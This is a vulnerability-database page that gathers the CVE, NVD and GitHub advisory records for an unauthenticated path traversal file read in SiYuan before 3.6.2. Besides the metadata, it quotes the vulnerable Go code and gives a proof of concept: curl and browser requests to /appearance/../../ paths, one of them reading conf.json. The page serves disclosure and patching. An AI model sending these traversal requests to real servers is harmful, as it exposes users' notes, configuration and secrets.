Vulnerability-Lookup

CVE-2026-33476 (GCVE-0-2026-33476)

Vulnerability from cvelistv5 – Published: 2026-03-20 22:34 – Updated: 2026-03-23 21:41

Title

SiYuan has an Unauthenticated Arbitrary File Read via Path Traversal

Summary

SiYuan is a personal knowledge management system. Prior to version 3.6.2, the Siyuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath.` Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-73 - External Control of File Name or Path

Assigner

GitHub_M

References

URL

Tags

	https://github.com/siyuan-note/siyuan/security/ad…	x_refsource_CONFIRM
	https://github.com/siyuan-note/siyuan/commit/009b…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	siyuan-note	siyuan	Affected: < 3.6.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33476",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-23T20:53:12.729058Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-23T21:41:45.226Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "siyuan",
          "vendor": "siyuan-note",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.6.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "SiYuan is a personal knowledge management system. Prior to version 3.6.2, the Siyuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath.` Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-73",
              "description": "CWE-73: External Control of File Name or Path",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-20T22:34:40.051Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7"
        },
        {
          "name": "https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a"
        }
      ],
      "source": {
        "advisory": "GHSA-hhgj-gg9h-rjp7",
        "discovery": "UNKNOWN"
      },
      "title": "SiYuan has an Unauthenticated Arbitrary File Read via Path Traversal"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33476",
    "datePublished": "2026-03-20T22:34:40.051Z",
    "dateReserved": "2026-03-20T16:16:48.970Z",
    "dateUpdated": "2026-03-23T21:41:45.226Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33476\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-20T23:16:48.137\",\"lastModified\":\"2026-03-23T22:16:31.057\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"SiYuan is a personal knowledge management system. Prior to version 3.6.2, the Siyuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath.` Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"},{\"lang\":\"en\",\"value\":\"CWE-73\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.6.2\",\"matchCriteriaId\":\"27CB71A7-7208-417A-AE6D-266D57F683E9\"}]}]}],\"references\":[{\"url\":\"https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33476\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-23T20:53:12.729058Z\"}}}], \"references\": [{\"url\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-23T20:53:26.415Z\"}}], \"cna\": {\"title\": \"SiYuan has an Unauthenticated Arbitrary File Read via Path Traversal\", \"source\": {\"advisory\": \"GHSA-hhgj-gg9h-rjp7\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"siyuan-note\", \"product\": \"siyuan\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.6.2\"}]}], \"references\": [{\"url\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7\", \"name\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a\", \"name\": \"https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"SiYuan is a personal knowledge management system. Prior to version 3.6.2, the Siyuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath.` Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-73\", \"description\": \"CWE-73: External Control of File Name or Path\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-20T22:34:40.051Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33476\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-23T21:41:45.226Z\", \"dateReserved\": \"2026-03-20T16:16:48.970Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-20T22:34:40.051Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33476

Vulnerability from fkie_nvd - Published: 2026-03-20 23:16 - Updated: 2026-03-23 22:16

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a	Patch
security-advisories@github.com	https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	b3log	siyuan	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "27CB71A7-7208-417A-AE6D-266D57F683E9",
              "versionEndExcluding": "3.6.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SiYuan is a personal knowledge management system. Prior to version 3.6.2, the Siyuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath.` Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue."
    }
  ],
  "id": "CVE-2026-33476",
  "lastModified": "2026-03-23T22:16:31.057",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-20T23:16:48.137",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        },
        {
          "lang": "en",
          "value": "CWE-73"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-HHGJ-GG9H-RJP7

Vulnerability from github – Published: 2026-03-20 20:43 – Updated: 2026-03-25 18:22

Summary

Siyuan has an Unauthenticated Arbitrary File Read via Path Traversal

Details

Summary

The Siyuan kernel exposes an unauthenticated file-serving endpoint under /appearance/*filepath. Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process.

Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials.

Details

Vulnerable Code Location

File: kernel/server/serve.go

siyuan.GET("/appearance/*filepath", func(c *gin.Context) {
    filePath := filepath.Join(
        appearancePath,
        strings.TrimPrefix(c.Request.URL.Path, "/appearance/")
    )
    ...
    c.File(filePath)
})

Technical Root Cause

The handler constructs a filesystem path by joining a base directory (appearancePath) with user-controlled URL segments.

Key issues:

1. Unsanitized User Input

The path component extracted from the request is not validated or normalized to prevent traversal.

strings.TrimPrefix(c.Request.URL.Path, "/appearance/")

This preserves sequences such as:

../
..\ (Windows)

2. Unsafe Path Joining

filepath.Join() does not enforce directory confinement.

This escapes the intended directory.

3. Direct File Serving

The resolved path is served without verification:

c.File(filePath)

Authentication Bypass (Unauthenticated Access)

Authentication middleware explicitly skips /appearance/ requests.

File: session.go

if strings.HasPrefix(c.Request.RequestURI, "/appearance/") ||
    strings.HasPrefix(c.Request.RequestURI, "/stage/build/export/") ||
    strings.HasPrefix(c.Request.RequestURI, "/stage/protyle/") {
    c.Next()
    return
}

This allows attackers to access the vulnerable endpoint without a session or token.

Exploitation Scenario

A remote attacker can craft a URL containing directory traversal sequences to read files accessible to the Siyuan process.

Example request:

GET /appearance/../../data/conf.json HTTP/1.1
Host: target

Because authentication is bypassed, the attack requires no credentials.

PoC

Step 1 — Create marker file

mkdir -p ./workspace/data
echo POC_EXPLOITED > ./workspace/data/poc_exploit.txt

Step 2 — Run SiYuan container

docker run -d \
  -p 6806:6806 \
  -e SIYUAN_ACCESS_AUTH_CODE_BYPASS=true \
  -v $(pwd)/workspace:/siyuan/workspace \
  b3log/siyuan \
  --workspace=/siyuan/workspace

Step 3 — Confirm service works

Open in browser:

http://127.0.0.1:6806

Exploit PoC

Method A — using CURL command

Use --path-as-is so curl does NOT normalize ../.

curl -v --path-as-is \
  "http://127.0.0.1:6806/appearance/../../data/poc_exploit.txt"

Output

HTTP/1.1 200 OK
POC_EXPLOITED

Method B — Using Browser

http://127.0.0.1:6806/appearance/../../data/poc_exploit.txt

If method B is not working, use method A, which is CURL command to do the exploit

Impact

An unauthenticated attacker can read arbitrary files accessible to the server process, including:

Workspace configuration files
User notes and stored data
API tokens and secrets
Local system files (depending on permissions)

This may lead to:

Sensitive information disclosure
Credential leakage
Further compromise through exposed secrets

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.0-20260317012524-fe4523fff2c8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33476"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T20:43:20Z",
    "nvd_published_at": "2026-03-20T23:16:48Z",
    "severity": "HIGH"
  },
  "details": "##  Summary\n\nThe Siyuan kernel exposes an unauthenticated file-serving endpoint under **/appearance/*filepath.**\nDue to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process.\n\nAuthentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials.\n\n## Details\n\nVulnerable Code Location\n\n**File: kernel/server/serve.go**\n\n``` sh\nsiyuan.GET(\"/appearance/*filepath\", func(c *gin.Context) {\n    filePath := filepath.Join(\n        appearancePath,\n        strings.TrimPrefix(c.Request.URL.Path, \"/appearance/\")\n    )\n    ...\n    c.File(filePath)\n})\n```\n\n\n**Technical Root Cause**\n\nThe handler constructs a filesystem path by joining a base directory (appearancePath) with user-controlled URL segments.\n\n**Key issues:**\n\n**1. Unsanitized User Input**\n\nThe path component extracted from the request is not validated or normalized to prevent traversal.\n\n``` sh\nstrings.TrimPrefix(c.Request.URL.Path, \"/appearance/\")\n``` \n\nThis preserves sequences such as:\n\n``` sh\n../\n..\\ (Windows)\n```\n\n**2. Unsafe Path Joining**\n\n**_filepath.Join()_** does not enforce directory confinement.\n\nThis escapes the intended directory.\n\n**3. Direct File Serving**\n\nThe resolved path is served without verification:\n\n``` sh\nc.File(filePath)\n``` \n\n### Authentication Bypass (Unauthenticated Access)\n\nAuthentication middleware explicitly skips /appearance/ requests.\n\n**File: session.go**\n``` sh\nif strings.HasPrefix(c.Request.RequestURI, \"/appearance/\") ||\n    strings.HasPrefix(c.Request.RequestURI, \"/stage/build/export/\") ||\n    strings.HasPrefix(c.Request.RequestURI, \"/stage/protyle/\") {\n    c.Next()\n    return\n}\n```\nThis allows attackers to access the vulnerable endpoint without a session or token.\n\n### Exploitation Scenario\n\nA remote attacker can craft a URL containing directory traversal sequences to read files accessible to the Siyuan process.\n\nExample request:\n\n```\nGET /appearance/../../data/conf.json HTTP/1.1\nHost: target\n\n```\nBecause authentication is bypassed, the attack requires no credentials.\n\n\n\n\n## PoC\n\n**Step 1 \u2014 Create marker file**\n\n```\nmkdir -p ./workspace/data\necho POC_EXPLOITED \u003e ./workspace/data/poc_exploit.txt\n```\n\n**Step 2 \u2014 Run SiYuan container**\n\n```\ndocker run -d \\\n  -p 6806:6806 \\\n  -e SIYUAN_ACCESS_AUTH_CODE_BYPASS=true \\\n  -v $(pwd)/workspace:/siyuan/workspace \\\n  b3log/siyuan \\\n  --workspace=/siyuan/workspace\n\n```\n\n**Step 3 \u2014 Confirm service works**\n\nOpen in browser:\n\n``` sh\nhttp://127.0.0.1:6806\n```\n\n### Exploit PoC\n**Method A \u2014 using CURL command**\n\nUse --path-as-is so curl does NOT normalize ../.\n\n``` sh\ncurl -v --path-as-is \\\n  \"http://127.0.0.1:6806/appearance/../../data/poc_exploit.txt\"\n```\n\n**Output** \n\n``` sh\nHTTP/1.1 200 OK\nPOC_EXPLOITED\n```\n\n**Method B \u2014 Using Browser**\n\n``` sh\nhttp://127.0.0.1:6806/appearance/../../data/poc_exploit.txt\n```\n\nIf **method B** is not working, use **method A**, which is  CURL command to do the exploit\n\n\n### Impact\n\nAn unauthenticated attacker can read arbitrary files accessible to the server process, including:\n\n- Workspace configuration files\n- User notes and stored data\n- API tokens and secrets\n- Local system files (depending on permissions)\n\nThis may lead to:\n\n- Sensitive information disclosure\n- Credential leakage\n- Further compromise through exposed secrets",
  "id": "GHSA-hhgj-gg9h-rjp7",
  "modified": "2026-03-25T18:22:10Z",
  "published": "2026-03-20T20:43:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33476"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Siyuan has an Unauthenticated Arbitrary File Read via Path Traversal"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33476 (GCVE-0-2026-33476)

FKIE_CVE-2026-33476

GHSA-HHGJ-GG9H-RJP7

Summary

Details

Authentication Bypass (Unauthenticated Access)

Exploitation Scenario

PoC

Exploit PoC

Impact

Tags

Sightings

Nomenclature